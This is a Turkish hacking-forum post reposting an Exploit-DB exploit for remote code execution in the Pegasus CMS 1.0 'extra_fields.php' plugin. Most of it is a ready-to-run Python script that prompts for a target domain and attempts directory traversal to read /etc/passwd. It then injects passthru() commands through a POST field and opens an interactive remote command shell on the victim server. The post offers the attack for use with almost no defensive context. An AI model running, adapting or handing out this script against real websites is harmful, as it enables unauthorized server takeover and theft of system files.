İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

Pegasus CMS 1.0 - 'extra_fields.php' Plugin Remote Code Execution

18-03-2019 11:40
#1
Kacamax - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2012
Nereden:
Sivas / 58
Yaş:
30
Mesajlar:
654
Teşekkür (Etti):
167
Teşekkür (Aldı):
66
Konular:
190
Ticaret:
(0) %
# Exploit Basligi / Exploit Title: Pegasus extra_fields.php Plugin Remote Code Execution
# Tarih / Date: 14 March 2019
# Exploit Yazar / Exploit Author: R3zk0n
# Yapimci Adrersi/ endor Homepage: https://www.wisdom.com.au/web/pegasus-cms
# Yazilim Adresi / Software Link: N/A
# Versiyon / Version: 1.0
# Testedilen Sistem / Tested on: Linux
# CVE : N/A



Pegasus CMS "extra_fields.php" eklentisinin isleyis bicimiyle uzaktan kod yürütülmesine karsi savunmasizdir.
Eklenti ile Uzaktan kod calistirmak icin Bu Linkteki adresi kullanarak daha detayli anlatima bakabilirsiniz.

Exploits:

Kod:
#Eval is secure.. not really.
# These Greetz to people who are smart, Wireghoul, Nano, Silverly, m3mantra, and leostat. and z3al
requests.packages.urllib3.disable_warnings()
banner = '''
Welcome to the DANGER ZONE.
                                  
Chimeria Exploit.
pegausCMS Exploit's.
'''


print banner


raw_url = raw_input("Please enter a domain name: \n")


def dir_Trav(raw_url):
    print "Checking for directory travseral..\n"
    dir_list = requests.get("https://www."+ raw_url + "/file/includes/template/inc/test.cgi?&filename=/../../../../../../../../etc/passwd", headers={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Connection": "close", "Cache-Control": "max-age=0"})
    print dir_list.content
    return
print "Trying to execute directory travseral"
dir_Trav(raw_url)
r = requests.get("http://" + raw_url)
print "Checking Status code: %s" % r.status_code
if r.status_code == 200:
    print "Connected"
    print "Checking is using vulnerable CMS."
    vuln = "http://" + raw_url + "/file/includes/plugins/globalFields/submit.php"
    b = requests.get("http://" + raw_url + "/file/includes/plugins/globalFields/submit.php")
    print "Checking CMS Status: %s " % b.status_code
    if b.status_code == 200:
        print "Seems exploitable.. Lets try to list the files!"



        print raw_url
        list_files = requests.post("http://www."+ raw_url +"/file/includes/plugins/extra_fields/submit.php", headers={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}, data={"action": "passthru("ls -lah");exit;phpinfo"})
        print list_files.content
        status = list_files.status_code
        while status == 200:
            try:
                ShellCheck = raw_input("Shell>").strip()

                Shell = requests.post("http://www."+ raw_url +"/file/includes/plugins/extra_fields/submit.php", headers={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}, data={"action": "passthru("{}");exit;phpinfo".format(ShellCheck)})

                print Shell.content
                if ShellCheck == "exit":
                    sys.exit(0)
            except KeyboardInterrupt:
                print "Your exited bye"
                sys.exit(0)

    else:
        print "Connected but does not seem exploitable. \n"
        print "Bye!!!!!!!!!! \n"




else:
    print "Not connected"
Exploit Adresi: https://www.exploit-db.com/exploits/46542
Kullanıcı İmzası
“Bir soru sorulduğunda sorudan çok sana soruyu soranı tanımaya çalış”


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı